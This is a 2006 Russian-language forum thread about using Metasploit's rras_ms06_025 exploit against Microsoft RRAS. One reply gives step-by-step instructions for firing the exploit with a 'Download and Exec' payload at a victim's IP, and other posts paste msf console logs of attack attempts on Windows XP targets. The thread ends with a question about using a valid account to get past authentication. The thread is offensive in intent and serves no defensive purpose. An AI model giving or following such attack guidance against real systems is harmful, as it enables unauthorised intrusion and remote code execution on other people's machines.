PDA

Просмотр полной версии : Exploit rras_ms06_025


firemen
29.06.2006, 17:38
Мужики кто пробовал:
http://www.securitylab.ru/poc/269362.php


Как вообще юзать эти метасплоиты?

Metasploit Framework поставил был как-то, но без понятия пока что это такое и как:)

Подскажите кто знает.

Mastermind
29.06.2006, 18:42
Если качал до 22.06, то сначала запусти MSFUpdate, чтобы обновиться до последей версии. Потом запускай MSFWeb (в ней удобнее). Открывай браузер и вписывай http://127.0.0.1:55555. Далее выбирай EXPLOITS. Выбирай в списка app::rras. Выбирай нужный экплойт. Далее внизу есть ссылка выбора целевой системы. На этом этапе выбираешь PAYLOAD. Например, Download and Exec (даунлоадер, скачивает и выполняет файл). Вписываешь IP жертвы и ссылку на файл для загрузки и запуска. Жмешь Exploit. Вроде все...

-=lebed=-
30.06.2006, 13:43
WIN_XP_SP2 (без дополнительных патчей) не уязвима?

msf rras_ms06_025(win32_reverse) > exploit
Starting Reverse Handler.
Detected a windоws XP target...
Sending request...
WARNING: ACK response => at /home/ifгаmеwork/lib/Pex/DCERPC.pm line 957.
RPC server responded with:
1
This probably means that the system is patched
Exiting Reverse Handler.
msf rras_ms06_025(win32_reverse) >

AoD
30.06.2006, 15:14
WIN_XP_SP2 (без дополнительных патчей) не уязвима?

Естественно для кого это пишут?

Name: Microsoft RRAS MSO6-025 Stack Overflow
Version: 1.1
Targeting: win32, win2000, winxp / x86
Privileges: Yes
Authors:
Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>
H D Moore <hdm [at] metasploit.com>

Disclosed: Jun 13 2006
Targets:
0 - Automatic
1 - Windows 2000
2 - Windows XP SP1

-=lebed=-
30.06.2006, 15:34
А на секуре это для кого?

Для успешной эксплуатации уязвимости на системах Windows XP SP2 и Windows Server 2003 требуется валидная учетная запись пользователя. На Windows 2000 SP4 и Windows XP SP1 уязвимость может быть эксплуатирована анонимным пользователем.

Походу просто сплоита ещё для SP2 нет, а уязвимость и там есть...

-=lebed=-
04.07.2006, 15:26
Вот что выдаёт при атаке WIN_XP_SP1

msf rras_ms06_025(win32_reverse) > exploit
Starting Reverse Handler.
WARNING: Failed to establish a null session: Session setup returned NT statu
s 0xc000015b at /home/framework/lib/Pex/DCERPC.pm line 852.
Could not bind to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:10.0.3.5
6[\SRVSVC]
Exiting Reverse Handler.
msf rras_ms06_025(win32_reverse) >

Jokerz
16.07.2006, 14:48
Хорошо, а как использовать валидную учётку??